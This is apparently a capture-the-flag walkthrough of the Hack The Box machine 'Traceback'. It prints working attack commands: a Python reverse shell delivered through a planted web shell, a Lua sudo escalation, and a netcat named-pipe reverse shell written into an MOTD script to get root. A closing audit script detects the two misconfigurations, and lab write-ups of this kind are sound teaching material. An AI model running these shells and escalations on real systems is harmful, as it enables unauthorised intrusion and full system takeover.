Again, we start with nmap -sC -sV -Pn -p- -oA ./Traceback 10.10.10.181
We've got HTTP and SSH on their standard ports. Let's start with the HTTP info and go from there.
Checking the HTML source gives us:
<!--Some of the best web shells that you might need ;)-->
I seem to remember something on this somewhere, so let's jump to Google and verify.
Well, at least we now have a list of filenames we can easily Gobuster with.....
Dump the file names into a shells.txt file and Gobust away.
Got one! smevk.php is my page. If we look at that GitHub page and the source of smevk.php, we find the creds are admin:admin
So, we log in and ...... Huh? smevk the crap?!?! After my eyes stop bleeding, we see that we have the ability to execute system commands. Let's (please GOD) use this to gain a reverse shell because looking at SmEvK v3 is seriously damaging to my eyeballs. Drop:
python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.7",9999));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
into the Execute section (after starting an nc -lvnp 9999 of course) and run it. Sweet Merciful Computer Gods, we have a shell and can at least minimize the craziness. Now, instead of worrying about the LinEnum script just yet, I'm going to jump over to the webadmin user's Home directory first. In there we find a note.txt
The note mentions Lua and is addressed to a sysadmin. So, first let's check sudo -l and see what we can actually do.
$ sudo -l
Matching Defaults entries for webadmin on traceback:
User webadmin may run the following commands on traceback:
(sysadmin) NOPASSWD: /home/sysadmin/luvit
We can run "luvit" as sysadmin, but we can't see what exactly it does (except we know it executes lua code). Let's try this:
echo "require('os');" > priv.lua
echo "os.execute('/bin/bash');" >> priv.lua
sudo -u sysadmin /home/sysadmin/luvit ./priv.lua
Success!! We are now sysadmin. Running bash -i gets a better interactive shell. Grab the user flag and onward to root.
It's a good thing that we haven't tried any scripts yet. We unfortunately need to jump BACK to the SmEvK console and upload PSPY64. It'll take some doing, as in you'll have to disconnect the reverse shell, upload it, and then jump back to sysadmin, but once you have it running (which you'll have to disconnect AGAIN to stop running it [maybe I should have made ssh keys as a stop-gap......]) you'll see that update-motd.d runs every 30 seconds or so.
/bin/sh -c sleep 30 ; /bin/cp /var/backups/.update-motd.d/* /etc/update-motd.d/
Well, crap. It looks like I should have created those ssh keys because I need the 00-header inside of update-motd.d to run when I ssh to the system. So, here goes. I copy my key into the authorized_keys file (no, I'm not publishing it here) and set up the replacement header as:
echo -ne '#!/bin/sh\n\nrm -rf /tmp/p; mknod /tmp/p p; /bin/bash </tmp/p | /bin/nc 10.10.14.7 4444 >/tmp/p' > /etc/update-motd.d/00-header
and here's where speed is of the essence. Start nc -lvnp 4444, run the echo to replace the header, and then immediately ssh -i sysadmin_traceback firstname.lastname@example.org. You have only 30 seconds to complete the task.
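From the defender's side, the two things that make this box fall are the NOPASSWD sudo rule handing webadmin an interpreter (luvit) and MOTD scripts under /etc/update-motd.d that a non-root user can overwrite before root runs them at login. The audit script below is an added example, not part of the original writeup: it flags both conditions, using a constructed sudo rule and a throwaway directory so it runs offline. The interpreter list is an assumption you should extend for your own hosts.

```shell
#!/bin/sh
# Added audit example (not from the writeup). Flags the two weaknesses this
# box exhibits: a NOPASSWD sudo rule that hands a non-root user a script
# interpreter, and MOTD scripts that someone other than root can write.

# Returns 0 if a "sudo -l" style rule grants NOPASSWD on a known interpreter.
# The interpreter list is an assumption; add whatever your hosts ship.
risky_sudo_rule() {
  printf '%s\n' "$1" |
    grep -Eq 'NOPASSWD:.*/(luvit|lua[0-9.]*|python[0-9.]*|perl|ruby|node|bash|sh)$'
}

# Prints every regular file in the given MOTD directory that is writable by
# group or other. Anything listed here runs as root on the next SSH login.
writable_motd_scripts() {
  find "$1" -type f \( -perm -020 -o -perm -002 \) 2>/dev/null | sort
}

# Demo with constructed data so the script runs without touching the real box.
main() {
  printf 'sudo rules:\n'
  for rule in '(sysadmin) NOPASSWD: /home/sysadmin/luvit' '(ALL) /usr/bin/apt update'; do
    if risky_sudo_rule "$rule"; then
      printf '  RISKY  %s\n' "$rule"
    else
      printf '  ok     %s\n' "$rule"
    fi
  done

  # Constructed stand-in for /etc/update-motd.d with one bad permission set.
  tmp=$(mktemp -d)
  printf '#!/bin/sh\nuptime\n' > "$tmp/00-header";    chmod 777 "$tmp/00-header"
  printf '#!/bin/sh\n'         > "$tmp/10-help-text"; chmod 755 "$tmp/10-help-text"
  printf 'writable MOTD scripts in %s:\n' "$tmp"
  writable_motd_scripts "$tmp"
  rm -rf "$tmp"
}

main
```

On a real host, feed it the output of sudo -l for each interactive user and point writable_motd_scripts at /etc/update-motd.d.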